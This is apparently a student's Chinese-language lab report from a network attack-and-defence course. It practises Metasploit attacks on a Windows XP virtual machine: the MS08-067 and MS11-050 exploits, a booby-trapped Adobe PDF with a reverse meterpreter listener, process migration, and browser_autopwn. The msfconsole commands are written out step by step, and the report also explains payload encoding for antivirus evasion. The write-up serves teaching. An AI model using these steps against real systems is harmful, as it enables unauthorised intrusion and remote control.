20145227鄢曼君《网络对抗》MSF基础应用
主动攻击:ms08_067漏洞攻击实践
- 两台虚拟机,其中一台为kali,一台为windows xp sp3(英文版)。在VMware中设置两台虚拟机网络为NAT模式,让两台虚拟机ping通。
- 在kali终端中开启msfconsole。
- 输入命令
search ms08_067
,会显示出找到的渗透模块:
- 输入命令
use exploit/windows/smb/ms08_067_netapi
,进入该漏洞模块的使用。
- 输入命令
show payloads
会显示出有效的攻击载荷,我们找到一个shell_reverse_tcp。
- 使用命令
set payload generic/shell_reverse_tcp
设置攻击有效载荷。
- 输入命令
set LHOST "kali Ip"
set RHOST "Win xp Ip"
- 使用命令
show options
查看payload状态。
- 在kali上执行
ipconfig/all
得到如下图所示:
- 可以发现二者结果相同,说明成功攻击。
- 还可以进行MS08_067远程漏洞攻击实践:meterpreter
- 前面都和上面的步骤相同。设置payload:set payload windows/meterpreter/reverse_tcp
- 输入命令
exploit
开始攻击,攻击成功。
对浏览器攻击:MS11_050漏洞渗透攻击实践
- 两台虚拟机相互ping通。
- kali中开启
msfconsole
。由于这次做的是ms11_050漏洞攻击,输入命令use windows/browser/ms11_050_mshtml_cobjectelement
,使用该模块;info
即可查看关于该漏洞的信息
- 查看kali,显示一个session 1已经创建:
Adobe阅读器渗透攻击
- kali下打开显示隐藏文件。
- 在kali终端中开启
msfconsole
- 输入命令
use exploit/windows/fileformat/adobe_cooltype_sing
,进入该漏洞模块的使用。
- 使用命令
set payload windows/meterpreter/reverse_tcp
设置攻击有效载荷。
- 设置相关数据:
- 使用命令
show options
,看是否设置成功。
- 输入
exploit
,生成pdf文件,并可以看到pdf所在文件夹,将pdf复制到靶机里。
- 使用
back
退出当前模块,并使用use exploit/multi/handler
新建一个监听模块。
- 使用
set payload windows/meterpreter/reverse_tcp
建立一个反向连接。注意的是,这里需要输入命令set LPORT 5227
和攻击模块里的数据设置为一样的。
- 使用命令
exploit
开始攻击,在xp中打开pdf。攻击成功结果如下图:
- 将进程迁移到explorer.exe.使用ps查看当前进程,并找到explorer.exe的进程号,如下图所示:
- 使用命令
migrate 296
成功后输入shell,可查看xp靶机信息。还可进行一些操作。
- 在靶机xp中使用命令
netstat -an
,看本地tcp连接。发现成功连接。
辅助模块应用:使用浏览器渗透攻击server/browser_autopwn 模块
- browser_autopwn 是 Metasploit 提供的辅助功能模块。在用户访问 Web 页面时,它会自动攻击受害者的浏览器。在开始攻击之前,browser_autopwn 能够检测用户使用的浏览器类型,根据浏览器的检测结果,自行部署最合适的 exploit。
- 这是针对浏览器程序本身的渗透攻击,主要利用浏览器本身的漏洞,如 IE 浏览器,经常由于自身安全漏洞导致攻击者能够构造恶意网页进行渗透攻击。
- 打开终端窗口,启动msfconsole,选择
server/browser——autopwn
模块,配置 LHOST、 SRVHOST 为主控端 IP,设置 URIPATH 为 auto
。最后运行run
。
- 之后 metasploit 会自动生成利用浏览器本身的一些典型漏洞的网页,此处生成了 20 个。
- 攻击成功。查看检测结果,可以看到kali向靶机发送了很多数据包,用于检测该漏洞是否能利用,实际上靶机是打开了很多个网页,访问了产生的20个页面。
问题回答
用自己的话解释什么是exploit,payload,encode.
- exploit就相当于是一个运载的工具,将负责攻击的代码传送到靶机中。
- payload也就是负责攻击的代码,之前我们实验就做过。
- encode也就是编码,它主要有两个功能,一是为了避免之前的payload中出现坏字符,二就是它要伪装从而实现免杀,不让杀毒软件很轻易的就发现payload是攻击代码。
实验体会
- 这次实验最大的感受就是电脑有一个大的内存条是多么重要。之前做的时候同时开两个虚拟机电脑卡的要死,做一晚上只能做一点点,时间都浪费在等电脑反应上了。后面换了一个大的内存条,实验就很顺畅了。然后这次实验老师要求至少有一个和别人不一样,我觉得这点非常好,让我们在做的过程中能更多的去思考,而不是完全照着别人的过一遍而不思考。还有一个感受就是我们这次实验攻击的靶机都是xp系统,漏洞都是很早之前的,要想攻击现在的电脑可就没有这么容易了。有点期待下一周的任务了,又会有什么不一样的呢?